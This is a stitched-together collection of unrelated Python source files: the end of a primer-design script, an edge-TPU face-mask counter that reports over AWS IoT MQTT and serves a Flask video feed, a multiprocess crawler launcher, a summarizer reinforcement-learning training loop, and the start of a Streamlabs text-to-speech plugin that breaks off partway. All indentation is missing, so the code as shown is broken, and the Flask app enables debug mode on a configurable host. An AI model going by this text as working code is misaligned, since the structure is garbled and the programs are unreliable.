for target_isoform_ID in this_locus_target_isoform_IDs:
#if (target_isoform_ID not in ["ERCC-00134"]):
# continue
num_valid_signatures_for_isoform = 0
print >> sys.stderr, "\nINFO: finding signature with primers for %s" % target_isoform_ID
the_other_isoforms = locus_isoforms - set([target_isoform_ID])
if (do_in_parallel):
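# In the parallel path each candidate signature gets its own
# multiprocessing.Process running findPrimerPair, and results come back on
# the shared Queue keyed by the signature tuple (collected below via q.get()).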
q = Queue()
all_unique_signatures, jobs = [], []
for signature in all_signature_generators[target_isoform_ID].getAllSignatures():
if (not any([all_signature_generators[x].signatureIndicatesMe(signature) for x in the_other_isoforms])):
num_valid_signatures_for_isoform += 1
all_unique_signatures.append(signature)
job = Process(target=signature.findPrimerPair, args=(primer3_param_sets, transcriptomic_MFE, genomic_MFE, mfe_options, set([target_isoform_ID]), False, q))
job.start()
print >> sys.stderr, "Started job"
jobs.append(job)
if (len(all_unique_signatures)>0):
for job in jobs:
job.join()
primer_results = dict([q.get() for job in jobs])
signature_results = []
for signature in all_unique_signatures:
signature_tuple = signature.getSignatureTuple()
if (primer_results[signature_tuple] != None):
signature.setPrimerPair( * primer_results[signature_tuple] )
signature_results.append( (signature.getPrimerPairStratum(), signature.getAmpliconLength(), signature) )
if (len(signature_results) > 0):
signature_results = sorted(signature_results, key=itemgetter(0,1))
target_isoform_signature_with_primer_pair[target_isoform_ID] = signature_results[0][-1]
else:
potential_signature = all_signature_generators[target_isoform_ID].nextPotentialSignature()
best_primer_pair_stratum = 1e10
while (potential_signature != None): # and best_primer_pair_stratum > 0): # (not potential_signature.hasPrimerPair() or
if (not any([all_signature_generators[x].signatureIndicatesMe(potential_signature) for x in the_other_isoforms])):
num_valid_signatures_for_isoform += 1
print >> sys.stderr, "\tEvaluating signature", potential_signature.signature_tuple
msg = potential_signature.findPrimerPair(primer3_param_sets, transcriptomic_MFE, genomic_MFE, mfe_options, target_isoform_ID,
fwd_tag, rev_tag, True, True)
if (potential_signature.hasPrimerPair()):
if (target_isoform_signature_with_primer_pair.has_key(target_isoform_ID)):
if (target_isoform_signature_with_primer_pair[target_isoform_ID].getPrimerPairStratum() > potential_signature.getPrimerPairStratum()):
print >> sys.stderr, msg, "Is new best because primers from lower parameter stratum."
target_isoform_signature_with_primer_pair[target_isoform_ID] = potential_signature
best_primer_pair_stratum = potential_signature.getPrimerPairStratum()
elif (target_isoform_signature_with_primer_pair[target_isoform_ID].getAmpliconLength() > potential_signature.getAmpliconLength() and
target_isoform_signature_with_primer_pair[target_isoform_ID].getPenalty() > potential_signature.getPenalty()):
print >> sys.stderr, msg, "Is new best because amplicon is shorter and has smaller Primer3 penalty."
target_isoform_signature_with_primer_pair[target_isoform_ID] = potential_signature
best_primer_pair_stratum = potential_signature.getPrimerPairStratum()
else:
print >> sys.stderr, msg
target_isoform_signature_with_primer_pair[target_isoform_ID] = potential_signature
best_primer_pair_stratum = potential_signature.getPrimerPairStratum()
potential_signature = all_signature_generators[target_isoform_ID].nextPotentialSignature()
if (not target_isoform_signature_with_primer_pair.has_key(target_isoform_ID)):
if (num_valid_signatures_for_isoform > 0):
num_isoforms_signature_but_no_primers += 1
print >> sys.stderr, "WARNING: could not find suitable primer pair for any of the %d signature(s) of %s" % \
(num_valid_signatures_for_isoform, target_isoform_ID)
else:
num_isoforms_no_signature += 1
print >> sys.stderr, "WARNING: could not find distinguishing signature for %s" % target_isoform_ID
transcriptomic_MFE.finalize()
genomic_MFE.finalize()
print >> sys.stderr, "\nINFO: of %d isoforms, %d had no signatures and %d had no signature primers" % \
(len(target_isoforms), num_isoforms_no_signature, num_isoforms_signature_but_no_primers)
return target_isoform_signature_with_primer_pair
def evalPrimerPool(target_isoform_signature_with_primer_pair):
all_primers = []
for isoformID, potential_signature in target_isoform_signature_with_primer_pair.items():
fp, fp_tm, rp, rp_tm, strand = potential_signature.getPrimerPair()
all_primers.extend( [(isoformID, "fwd", fp), (isoformID, "rev", rp)] )
OligosEvaluator = DNAStructureEvaluator(56.0)
# Evaluate all pairs of primers (excluding ones from same isoformID)
all_primer_pairs = []
for i in xrange(len(all_primers)-1):
for j in xrange(i+1, len(all_primers)):
if (all_primers[i][0] != all_primers[j][0]):
pair_label = "%s,%s+%s,%s" % (all_primers[i][0], all_primers[i][1], all_primers[j][0], all_primers[j][1])
all_primer_pairs.append( (pair_label, (all_primers[i][2], all_primers[j][2])) )
all_primer_pair_dG = OligosEvaluator.checkForDimer(all_primer_pairs, True)
def primer32ParamSets(num_ranges=5):
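# The parameter sets share the common Primer3 options and differ only in their
# melting-temperature window; they are tried in order of preference (58-63 C
# first, then progressively hotter or colder windows), and callers use the
# stratum index to prefer primer pairs found in earlier sets.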
common = [("PRIMER_TASK","generic"), ("PRIMER_EXPLAIN_FLAG",1), ("PRIMER_FIRST_BASE_INDEX",1), ("PRIMER_OPT_SIZE",18),
("PRIMER_MIN_SIZE",18), ("PRIMER_MAX_SIZE",24), ("PRIMER_PRODUCT_OPT_SIZE",150), ("PRIMER_PRODUCT_SIZE_RANGE","90-210"),
("PRIMER_PAIR_MAX_DIFF_TM",6), ("PRIMER_THERMODYNAMIC_ALIGNMENT",1)] # , ("SEQUENCE_INCLUDED_REGION","1,149")
param_sets = [ dict( common + [("PRIMER_MIN_TM",58), ("PRIMER_MAX_TM",63), ("PRIMER_OPT_TM",60), ("PRIMER_SALT_DIVALENT",2.5), ("PRIMER_DNTP_CONC",0.8)] ),
dict( common + [("PRIMER_MIN_TM",63), ("PRIMER_MAX_TM",66), ("PRIMER_OPT_TM",63), ("PRIMER_SALT_DIVALENT",2.5), ("PRIMER_DNTP_CONC",0.8)] ),
dict( common + [("PRIMER_MIN_TM",54), ("PRIMER_MAX_TM",57), ("PRIMER_OPT_TM",57), ("PRIMER_SALT_DIVALENT",2.5), ("PRIMER_DNTP_CONC",0.8)] ),
dict( common + [("PRIMER_MIN_TM",66), ("PRIMER_MAX_TM",69), ("PRIMER_OPT_TM",66), ("PRIMER_SALT_DIVALENT",2.5), ("PRIMER_DNTP_CONC",0.8)] ),
dict( common + [("PRIMER_MIN_TM",51), ("PRIMER_MAX_TM",54), ("PRIMER_OPT_TM",54), ("PRIMER_SALT_DIVALENT",2.5), ("PRIMER_DNTP_CONC",0.8)] ) ]
return param_sets[0:num_ranges]
if (__name__ == "__main__"):
fwd_tag, rev_tag, target_isoform_IDs, genome_ref, transcriptome_ref, input_gtf, all_parts_bed, all_exonic_parts_tbl, output_file, output_gtf = sys.argv[1:]
target_isoforms = readTargetIsoformMRNAs(target_isoform_IDs, transcriptome_ref) # target_isoform_mRNAs
isoforms_per_gene, all_target_loci_isoforms, isoformOID = associateIsoformsToTargetGenesPlusOldID(input_gtf, target_isoforms)
isoform_parts_list = buildTargetIsoformPartsList(all_parts_bed, all_target_loci_isoforms)
annotateAndOrderTargetIsoformParts(all_exonic_parts_tbl, isoform_parts_list, all_target_loci_isoforms, True)
target_isoform_signature_with_primer_pair = designPrimers(target_isoforms, isoforms_per_gene, isoform_parts_list, genome_ref, transcriptome_ref, fwd_tag, rev_tag)
#cPickle.dump(target_isoform_signature_with_primer_pair, open("signature_primers.pkl","wb"))
#target_isoform_signature_with_primer_pair = cPickle.load(open("signature_primers.pkl","rb"))
evalPrimerPool(target_isoform_signature_with_primer_pair)
writeSignatures(target_isoform_signature_with_primer_pair, isoformOID, output_file, output_gtf)
sys.exit(0)
|
face-mask-iot.py
|
from utils.centroidtracker import CentroidTracker
from utils.trackableobject import TrackableObject
from utils.tracking import track_objects, draw_bounding_boxes
from imutils.video import VideoStream
from imutils.video import FPS
from flask import Flask, render_template, Response
from edgetpu.detection.engine import DetectionEngine
from edgetpu.utils import dataset_utils
from awscrt import io, mqtt, auth, http
from awsiot import mqtt_connection_builder
from PIL import Image
import numpy as np
import configparser
import imutils
import time
import cv2
import threading
import datetime
import os
import json
# load config file
config = configparser.ConfigParser()
config.read('vol/config.ini')
# get config file values
model = config['DETECTION']['model']
labels = config['DETECTION']['labels']
orientation = config['COUNTER']['orientation']
inDirection = config['COUNTER']['inDirection']
confidence = float(config['DETECTION']['confidence'])
coord = int(config['COUNTER']['coord'])
endpoint = config['IOT-DEVICE']['endpoint']
client_id = config['IOT-DEVICE']['client_id']
path_to_cert = config['IOT-DEVICE']['path_to_cert']
path_to_key = config['IOT-DEVICE']['path_to_key']
path_to_root = config['IOT-DEVICE']['path_to_root']
my_topic = config['IOT-DEVICE']['topic']
# Spin up resources
event_loop_group = io.EventLoopGroup(1)
host_resolver = io.DefaultHostResolver(event_loop_group)
client_bootstrap = io.ClientBootstrap(event_loop_group, host_resolver)
mqtt_connection = mqtt_connection_builder.mtls_from_path(
endpoint=endpoint,
cert_filepath=path_to_cert,
pri_key_filepath=path_to_key,
client_bootstrap=client_bootstrap,
ca_filepath=path_to_root,
client_id=client_id,
clean_session=False,
keep_alive_secs=6
)
# Make the connect() call
connect_future = mqtt_connection.connect()
# Future.result() waits until a result is available
connect_future.result()
lock = threading.Lock()
# Shared frame buffer for the MJPEG stream; initialised before the detection
# thread produces its first frame so generate() never hits a NameError.
outputFrame = None
engine = DetectionEngine(model)
labels = dataset_utils.read_label_file(labels)
ct1 = CentroidTracker(maxDisappeared=600, maxDistance=900)
ct2 = CentroidTracker(maxDisappeared=600, maxDistance=900)
app = Flask(__name__)
print(config.has_option("APP", "input"))
if config['APP']['input'] == "webcam":
print("[INFO] starting video stream...")
vs = VideoStream(src=0).start()
time.sleep(2.0)
vidcap = False
else:
print("[INFO] opening network camera or video file...")
vidcap = True
vs = cv2.VideoCapture(config['APP']['input'])
# start the frames per second throughput estimator
fps = FPS().start()
@app.route("/")
def index():
return render_template("index.html")
def detect_objects():
global outputFrame, lock
# initialize the total number of frames processed thus far, along
# with the total number of objects that have moved either up or down
totalFrames = 0
# individual counts to be sent across MQTT
count_unmasked = []
count_masked = []
# list to display totals locally
totals_unmasked = [0, 0]
totals_masked = [0, 0]
trackableObjects_unmasked = {}
trackableObjects_masked = {}
(H, W) = (None, None)
while True:
# grab the next frame and handle if we are reading from either
# VideoCapture or VideoStream
frame = vs.read()
if vidcap:
frame = frame[1]
frame = imutils.resize(frame, width=480)
rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
prepimg = Image.fromarray(rgb)
ans = engine.detect_with_image(
prepimg,
threshold=confidence,
keep_aspect_ratio=True,
relative_coord=False,
top_k=20)
# if the frame dimensions are empty, set them
if W is None or H is None:
(H, W) = frame.shape[:2]
if orientation == "V":
line_pt1 = (coord, 0)
line_pt2 = (coord, H)
elif orientation == "H":
line_pt1 = (0, coord)
line_pt2 = (W, coord)
# Draw dividing line
cv2.line(frame, (line_pt1), (line_pt2), (0, 255, 255), 2)
# initialise variables
rects_unmasked = []
rects_masked = []
payload = {}
payload['deviceID'] = client_id
# loop through detections
if ans:
for obj in ans:
if obj.label_id == 0:
rects_unmasked, frame = draw_bounding_boxes(
obj, labels, frame, rects_unmasked)
elif obj.label_id == 1:
rects_masked, frame = draw_bounding_boxes(
obj, labels, frame, rects_masked)
objects_unmasked = ct1.update(rects_unmasked)
objects_masked = ct2.update(rects_masked)
trackableObjects_unmasked, count_unmasked = track_objects(
objects_unmasked, trackableObjects_unmasked, orientation, coord, inDirection)
trackableObjects_masked, count_masked = track_objects(
objects_masked, trackableObjects_masked, orientation, coord, inDirection)
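# Each line crossing publishes one JSON message to the configured MQTT topic;
# given the fields set below, a payload looks roughly like:
#   {"deviceID": "<client_id>", "maskState": "Masked",
#    "personDirection": "In", "dateTime": "2021-01-01 12:00:00"}
# (the dateTime value here is only an illustrative example).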
if count_unmasked[0]:
payload['maskState'] = "Unmasked"
payload['personDirection'] = "In"
payload['dateTime'] = datetime.datetime.now().strftime(
"%Y-%m-%d %H:%M:%S")
mqtt_connection.publish(topic=my_topic, payload=json.dumps(
payload), qos=mqtt.QoS.AT_LEAST_ONCE)
totals_unmasked[0] += count_unmasked[0]
if count_unmasked[1]:
payload['maskState'] = "Unmasked"
payload['personDirection'] = "Out"
payload['dateTime'] = datetime.datetime.now().strftime(
"%Y-%m-%d %H:%M:%S")
mqtt_connection.publish(topic=my_topic, payload=json.dumps(
payload), qos=mqtt.QoS.AT_LEAST_ONCE)
totals_unmasked[1] += count_unmasked[1]
if count_masked[0]:
payload['maskState'] = "Masked"
payload['personDirection'] = "In"
payload['dateTime'] = datetime.datetime.now().strftime(
"%Y-%m-%d %H:%M:%S")
mqtt_connection.publish(topic=my_topic, payload=json.dumps(
payload), qos=mqtt.QoS.AT_LEAST_ONCE)
totals_masked[0] += count_masked[0]
if count_masked[1]:
payload['maskState'] = "Masked"
payload['personDirection'] = "Out"
payload['dateTime'] = datetime.datetime.now().strftime(
"%Y-%m-%d %H:%M:%S")
mqtt_connection.publish(topic=my_topic, payload=json.dumps(
payload), qos=mqtt.QoS.AT_LEAST_ONCE)
totals_masked[1] += count_masked[1]
# Build screen text output
text_masked = "IN: {} OUT: {}".format(
totals_masked[0], totals_masked[1])
cv2.putText(frame, text_masked, (W-120, 20),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)
text_unmasked = "IN: {} OUT: {}".format(
totals_unmasked[0], totals_unmasked[1])
cv2.putText(frame, text_unmasked, (W-120, 40),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)
# grab the current timestamp and draw it on the frame
timestamp = datetime.datetime.now()
cv2.putText(frame, timestamp.strftime("%d/%m/%y %H:%M:%S"), (W-120, H - 25),
cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 0), 2)
# increment the total number of frames processed thus far and
# then update the FPS counter
totalFrames += 1
fps.update()
# stop the timer and display FPS information
fps.stop()
# print("[INFO] elapsed time: {:.2f}".format(fps.elapsed()))
# print("[INFO] approx. FPS: {:.2f}".format(fps.fps()))
with lock:
outputFrame = cv2.resize(frame, (640, 480))
def generate():
global outputFrame, lock
while True:
with lock:
if outputFrame is None:
continue
(flag, encodedImage) = cv2.imencode(".jpg", outputFrame)
if not flag:
continue
yield(b'--frame\r\n' b'Content-Type: image/jpeg\r\n\r\n' +
bytearray(encodedImage) + b'\r\n')
@app.route("/video_feed")
def video_feed():
return Response(generate(),
mimetype="multipart/x-mixed-replace; boundary=frame")
if __name__ == '__main__':
t = threading.Thread(target=detect_objects)
t.daemon = True
t.start()
app.run(host=config['APP']['host'], port=config['APP']['port'], debug=True,
threaded=True, use_reloader=False)
disconnect_future = mqtt_connection.disconnect()
disconnect_future.result()
vs.stop()
cv2.destroyAllWindows()
|
process_crawler.py
|
# -*- encoding:utf8 -*-
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import multiprocessing
from threaded_crawler import threaded_crawler
def process_crawler(args, **kwargs):
num_cpus = multiprocessing.cpu_count()
print 'Starting {} processes'.format(num_cpus)
processes = []
for i in range(num_cpus):
p = multiprocessing.Process(target=threaded_crawler, args=[args], kwargs=kwargs)
p.start()
processes.append(p)
for p in processes:
p.join()
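# A minimal usage sketch (the seed URL below is a hypothetical placeholder;
# any keyword arguments are passed straight through to threaded_crawler):
#
#     if __name__ == '__main__':
#         process_crawler('http://example.webscraping.com')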
|
train_summary_loop_add_faith.py
|
from torch.utils.data import DataLoader, RandomSampler
import torch, os, sys, time, argparse, numpy as np
from utils_dataset import SQLDataset, HDF5Dataset
from transformers.optimization import AdamW
from model_generator import GeneTransformer
from datetime import datetime, timedelta
from utils_logplot import LogPlot
import utils_misc, utils_tokenizer
from model_faith import FEQA
from model_coverage import KeywordCoverage
from model_guardrails import PatternPenalty, LengthPenalty, RepeatPenalty
import threading, queue
user = os.getlogin()
parser = argparse.ArgumentParser()
parser.add_argument("--experiment", type=str, required=True, help="Experiment name. Will be used to save a model file and a log file.")
parser.add_argument("--dataset_file", type=str, required=True, help="Which dataset file to use. Can be full path or the root folder will be attached.")
parser.add_argument("--root_folder", type=str, default="/home/"+user+"/")
parser.add_argument("--train_batch_size", type=int, default=4, help="Training batch size.")
parser.add_argument("--n_epochs", type=int, default=3, help="Number of epochs to run over the data.")
parser.add_argument("--optim_every", type=int, default=4, help="Optimize every x backprops. A multiplier to the true batch size.")
parser.add_argument("--max_output_length", type=int, default=25, help="Maximum output length. Saves time if the sequences are short.")
parser.add_argument("--save_every", type=int, default=60, help="Number of seconds between any two saves.")
parser.add_argument("--device", type=str, default="cuda", help="cuda or cpu")
parser.add_argument('--fp16', action='store_true', help="Whether to use 16-bit (mixed) precision (through NVIDIA apex) instead of 32-bit")
parser.add_argument("--ckpt_every", type=int, default=600, help="If 0, checkpointing is not used. Otherwise, checkpointing is done very x seconds.")
parser.add_argument("--ckpt_lookback", type=int, default=300, help="When checkpointing, will consider the avg total score of the last x samples.")
args = parser.parse_args()
if args.device == "cuda":
freer_gpu = str(utils_misc.get_freer_gpu())
os.environ["CUDA_VISIBLE_DEVICES"] = ""+str(freer_gpu)
args.experiment += "_"+freer_gpu
models_folder = args.root_folder + "models/"
log_folder = args.root_folder + "logs/"
#summarizer_model_start = os.path.join(models_folder, "origin_models/gpt2_copier23.bin")
#summarizer_model_start = os.path.join(models_folder, "gpt2_test_cgen23.bin")
summarizer_model_start = os.path.join(models_folder, "summarizer_faith_batch2_1_ckpt.bin")
#summarizer_model_start = os.path.join(models_folder, "origin_models/summary_loop_length24.bin")
ckpt_every = args.ckpt_every
ckpt_lookback = int((args.ckpt_lookback+args.train_batch_size-1)/args.train_batch_size)
total_score_history = []
best_ckpt_score = None
ckpt_file = os.path.join(models_folder, "summarizer_"+args.experiment+"_ckpt.bin")
ckpt_optimizer_file = os.path.join(models_folder, "summarizer_optimizer_"+args.experiment+"_ckpt.bin")
learning_rate = 2e-5
n_epochs = args.n_epochs
if args.device == "cuda":
print("Training on GPU "+str(freer_gpu))
bert_tokenizer = utils_tokenizer.BERTCacheTokenizer()
print("---------------")
summarizer = GeneTransformer(max_output_length=args.max_output_length, device=args.device, tokenizer_type='gpt2', starter_model=summarizer_model_start)
print("Summarizer loaded")
def collate_func(inps):
if ".db" in args.dataset_file:
return [a['body'] for a in inps]
else:
return [inp[0].decode() for inp in inps]
param_optimizer = list(summarizer.model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
logplot_file = os.path.join(log_folder, "summary_loop_%s.log" % (args.experiment))
logplot = LogPlot(logplot_file)
optimizer = AdamW(optimizer_grouped_parameters, lr=learning_rate)
time_save = time.time()
time_ckpt = time.time()
if args.fp16:
try:
from apex import amp
except ImportError:
raise ImportError("Please install apex from https://www.github.com/nvidia/apex to use fp16 training.")
summarizer.model, optimizer = amp.initialize(summarizer.model, optimizer, opt_level="O1") # For now O1. See details at https://nvidia.github.io/apex/amp.html
print("Loading scorers")
# coverage_model_file = os.path.join(models_folder, "bert_coverage_on_cnndm_train_with_newsbert_n10_0.bin") # mydepC
coverage_model_file = os.path.join(models_folder, "origin_models/bert_coverage.bin")
# coverage_keyword_model_file = os.path.join(models_folder, "keyword_extractor.joblib")
fluency_news_model_file = os.path.join(models_folder, "origin_models/fluency_news_bs32.bin")
scorers = [
{"name": "coverage", "importance": 10.0, "sign": 1.0, "model": KeywordCoverage(args.device, model_file=coverage_model_file)}, # keyword_model_file=coverage_keyword_model_file,
{"name": "fluency", "importance": 2.0, "sign": 1.0, "model": GeneTransformer(max_output_length=args.max_output_length, device=args.device, starter_model=fluency_news_model_file)},
{"name": "patpen", "importance": 5.0, "sign": -1.0, "model": PatternPenalty()},
{"name": "lengthpen", "importance": 2.0, "sign": -1.0, "model": LengthPenalty(args.max_output_length)},
{"name": "reppen", "importance": 2.0, "sign": -1.0, "model": RepeatPenalty()},
{"name": "faith", "importance": 5.0, "sign": 1.0, "model": FEQA(device=args.device)}
]
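# Each scorer contributes sign * importance * score to the total reward, so the
# guardrail penalties (patpen, lengthpen, reppen) subtract from the total while
# coverage, fluency and faithfulness add to it (see the scoring loop below).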
def background_tokenizer(bodies, out_queue):
out_queue.put([bert_tokenizer.encode(body) for body in bodies])
my_queue = queue.Queue()
print("Started training")
if ".db" in args.dataset_file:
all_dataset = SQLDataset(args.dataset_file)
else:
all_dataset = HDF5Dataset(args.dataset_file, collection_name="name")
dataset = all_dataset
print("Dataset size:", len(dataset))
dataloader = DataLoader(dataset=dataset, batch_size=args.train_batch_size, sampler=RandomSampler(dataset), drop_last=True, collate_fn=collate_func)
def low_summary_quality(log_obj, total_sampled_scores):
current_total_score = torch.mean(total_sampled_scores).item()
if len(log_obj) == 0 or current_total_score < 4:
return True
else:
return ( log_obj["reppen_score"] > 0 or
log_obj["patpen_score"] > 0 or
log_obj["lengthpen_score"] == 1 or
log_obj['fluency_score'] < 0.3 or
log_obj['coverage_score'] < 0.3
)
for epi in range(n_epochs):
print("=================== EPOCH",epi, "===================")
for ib, documents in enumerate(dataloader):
Timer = {}
T1 = time.time()
log_obj = {}
bodies = [" ".join(doc.split(" ")[:300]) for doc in documents if len(doc) > 0 ]
# We run the BERT tokenization in the background, since it is only needed after the summarizer has run. Saves about 5% of time.
thread1 = threading.Thread(target = background_tokenizer, args = (bodies, my_queue))
# bodies_bert_tokenized = [bert_tokenizer.encode(body) for body in bodies] # This is the non-background version
thread1.start()
T2 = time.time()
Timer["preprocessing_starting"] = T2-T1
# T1b = time.time()
sampled_summaries, sampled_logprobs, sampled_tokens, input_past, sampled_end_idxs = summarizer.decode_batch(bodies, max_output_length=args.max_output_length, return_logprobs=True, sample=True)
T3 = time.time()
Timer["generator_sampled"] = T3-T2
with torch.no_grad():
argmax_summaries, argmax_end_idxs = summarizer.decode_batch(bodies, max_output_length=args.max_output_length, input_past=input_past)
T4 = time.time()
Timer["generator_argmax"] = T4-T3
selected_logprobs = torch.sum(sampled_logprobs, dim=1)
batch_size, seq_length = sampled_logprobs.shape
# Join the tokenizer thread here; the tokenization running in the background should be done by now.
thread1.join()
bodies_bert_tokenized = my_queue.get()
scores_track = {}
total_sampled_scores = torch.FloatTensor([0.0] * batch_size).to(args.device)
total_argmax_scores = torch.FloatTensor([0.0] * batch_size).to(args.device)
for scorer in scorers:
if scorer['name'] == "faith" and low_summary_quality(log_obj, total_sampled_scores):
continue # when summary quality is low, it is not worth computing faithfulness; the score is usually 0
T = time.time()
sampled_scores, extra = scorer['model'].score(sampled_summaries, bodies, bodies_tokenized=bodies_bert_tokenized, extra=None, lengths=sampled_end_idxs)
sampled_scores = torch.FloatTensor(sampled_scores).to(args.device)
argmax_scores, _ = scorer['model'].score(argmax_summaries, bodies, bodies_tokenized=bodies_bert_tokenized, extra=extra, lengths=argmax_end_idxs)
argmax_scores = torch.FloatTensor(argmax_scores).to(args.device)
Timer["scores_"+scorer['name']] = time.time()-T
total_sampled_scores += (scorer['sign'])*(scorer['importance'])*sampled_scores
total_argmax_scores += (scorer['sign'])*(scorer['importance'])*argmax_scores
log_obj[scorer['name']+"_score"] = sampled_scores.mean().item()
scores_track[scorer['name']+"_scores"] = sampled_scores
T5 = time.time()
Timer['all_scores'] = T5-T4
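# Self-critical policy-gradient style update: the greedy (argmax) summaries act
# as the baseline, so minimizing this loss raises the log-probability of
# sampled summaries that score above the baseline and lowers it for those that
# score below it.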
Loss = torch.mean((total_argmax_scores - total_sampled_scores) * selected_logprobs)
if args.fp16:
with amp.scale_loss(Loss, optimizer) as scaled_loss:
scaled_loss.backward()
else:
Loss.backward()
T6 = time.time()
Timer['backward'] = T6-T5
if ib%args.optim_every == 0:
optimizer.step()
optimizer.zero_grad()
T7 = time.time()
Timer['optim'] = T7-T6
# log_obj['summary_nwords'] = int(np.mean([summ.count(" ")+1 for summ in sampled_summaries]))
avg_total = total_sampled_scores.mean().item()
total_score_history.append(avg_total)
log_obj['summary_nwords'] = int(np.mean(sampled_end_idxs))
log_obj['loss'] = Loss.item()
log_obj['total_score'] = avg_total
log_obj['count'] = batch_size
logplot.cache(log_obj, prefix="T_")
Tfinal = time.time()
Timer['total'] = Tfinal - T1
# print(Timer)
if (time.time()-time_save > args.save_every):
print("==========================================")
print(bodies[0])
print("-----------")
print(sampled_summaries[0])
print("-----------")
print("Total score:", total_sampled_scores[0].item())
for scorer in scorers:
if scorer['name'] == "faith" and (scorer['name']+"_scores") not in scores_track:
continue
print(scorer['name']+" score:", scores_track[scorer['name']+"_scores"][0].item())
print("-----------")
logplot.save(printing=True)
# print(Timer)
time_save = time.time()
print("==========================================")
if ckpt_every > 0 and len(total_score_history) > ckpt_lookback:
current_score = np.mean(total_score_history[-ckpt_lookback:])
if time.time()-time_ckpt > ckpt_every:
revert_ckpt = best_ckpt_score is not None and current_score < min(1.2*best_ckpt_score, 0.8*best_ckpt_score) # Could be negative or positive
print("================================== CKPT TIME, "+str(datetime.now())+" =================================")
print("Previous best:", best_ckpt_score)
print("Current Score:", current_score)
print("[CKPT] Am I reverting?", ("yes" if revert_ckpt else "no! BEST CKPT"))
if revert_ckpt:
summarizer.model.load_state_dict(torch.load(ckpt_file))
optimizer.load_state_dict(torch.load(ckpt_optimizer_file))
time_ckpt = time.time()
print("==============================================================================")
if best_ckpt_score is None or current_score > best_ckpt_score:
print("[CKPT] Saved new best at: %.3f %s" % (current_score, "["+str(datetime.now())+"]"))
best_ckpt_score = current_score
torch.save(summarizer.model.state_dict(), ckpt_file)
torch.save(optimizer.state_dict(), ckpt_optimizer_file)
|
TTSAlertsAndChat_StreamlabsSystem.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
""" Text-To-Speech for Alerts and Chat Messages
1.1.4
Fixed bug adding unicode characters to banned words list
Added setting for ban messages
Added ability to ban users for a time
1.1.3
Fixed bug where banned words showed on overlay
1.1.2
Support ascii characters in overlay
1.1.1
Control overlay position/message, ban users, and set a character limit
1.1.0
Added $tts parameter, text-to-speech overlay, fixed twitch sub
1.0.0
Initial public release
"""
#---------------------------------------
# Script Import Libraries
#---------------------------------------
import os
import sys
import codecs
import json
from collections import OrderedDict
import time
import re
import threading
import clr
clr.AddReference("IronPython.Modules.dll")
clr.AddReference('System.Speech')
clr.AddReferenceToFileAndPath(os.path.join(os.path.dirname(os.path.realpath(__file__)), "StreamlabsEventReceiver.dll"))
from System.Speech.Synthesis import SpeechSynthesizer
from StreamlabsEventReceiver import StreamlabsEventClient
#---------------------------------------
# Script Information
#---------------------------------------
ScriptName = "TTS Alerts and Chat"
Website = "https://www.twitch.tv/kruiser8"
Description = "Text-to-speech for highlight chat messages."
Creator = "Kruiser8 (Mod by Travkina)"
Version = "1.1.4"
#---------------------------------------
# Script Variables
#---------------------------------------
# Socket Receiver
EventReceiver = None
# Settings file location
SettingsFile = os.path.join(os.path.dirname(__file__), "settings.json")
# UI Config file location
UIConfigFile = os.path.join(os.path.dirname(__file__), "UI_Config.json")
# Banned user file
BannedUserFile = os.path.join(os.path.dirname(__file__), "users.txt")
# Banned word file
BannedWordFile = os.path.join(os.path.dirname(__file__), "banned.txt")
# TTS Parser
RegTTS = re.compile(r"\$tts\((?P<message>.*?)\)")
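# Example: a chat message containing "$tts(Hello chat)" matches this pattern
# and the named group "message" captures "Hello chat".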
SubPlanMap = {
"Prime": "Prime",
"1000": "Tier 1",
"2000": "Tier 2",
"3000": "Tier 3"
}
#---------------------------------------
# Script Classes
#---------------------------------------
class Settings(object):
""" Load in saved settings file if available else set default values. """
def __init__(self, settingsfile=None):
try:
with codecs.open(settingsfile, encoding="utf-8-sig", mode="r") as f:
self.__dict__ = json.load(f, encoding="utf-8")
except:
self.VoiceName = ""
self.Volume = 100
self.Rate = 0
self.MaxCharacters = 0
self.MaxCharacterMessage = "{user}, your message was too long for text-to-speech."
self.TTSCommand = ""
self.TTSCommandPermission = "Everyone"
self.TTSCommandPermissionInfo = ""
self.TTSCommandCost = 0
self.TTSCommandMessage = "{user} says, {message}"
self.TTSCommandUsage = "Stream Chat"
self.TTSCommandUsageReply = False
self.TTSCommandUsageReplyMessage = "{user} you can only use this command from {usage}!"
self.TTSUseCD = False
self.TTSCasterCD = True
self.TTSCooldown = 0
self.TTSOnCooldown = "{user} the command is still on cooldown for {cooldown} seconds!"
self.TTSUserCooldown = 10
self.TTSOnUserCooldown = "{user} the command is still on user cooldown for {cooldown} seconds!"
self.TTSAllChat = True
self.TTSAllChatExcludeCommands = True
self.TTSAllChatMessage = "{user} says, {message}"
self.TTSAllChatUsage = "Stream Chat"
self.TTSAllChatUsageReply = False
self.TTSAllChatUsageReplyMessage = "{user} you can only use this command from {usage}!"
self.TTSOverlayExcludeAlerts = True
self.TTSOverlayMessage = "{user} says, {message}"
self.TTSOverlayTime = 8
self.TTSOverlayFontColor = "rgba(255,255,255,1.0)"
self.TTSOverlayUseFontOutline = False
self.TTSOverlayFontOutline = "rgba(0,0,0,0)"
self.TTSOverlayUseFontShadow = True
self.TTSOverlayFontShadow = "rgba(0,0,0,1.0)"
self.TTSOverlayFontSize = 32
self.TTSOverlayFont = ""
self.TTSOverlayUseBackground = True
self.TTSOverlayBackgroundColor = "rgba(0,0,0,1.0)"
self.TTSOverlayUseBorder = True
self.TTSOverlayBorderColor = "rgba(255,255,255,1.0)"
self.TTSOverlayHorizontalAlign = "center"
self.TTSOverlayVerticalAlign = "center"
self.TTSOverlayAnimateIn = 'fadeIn'
self.TTSOverlayAnimateOut = 'fadeOut'
self.MixerOnFollow = False
self.MixerFollowDelay = 0
self.MixerFollowMessage = "{name} has followed."
self.MixerOnHost = False
self.MixerHostMinimum = 0
self.MixerHostDelay = 0
self.MixerHostMessage = "{name} has hosted you with {amount} viewer{isPlural}."
self.MixerOnSub = False
self.MixerIncludeSubMessage = True
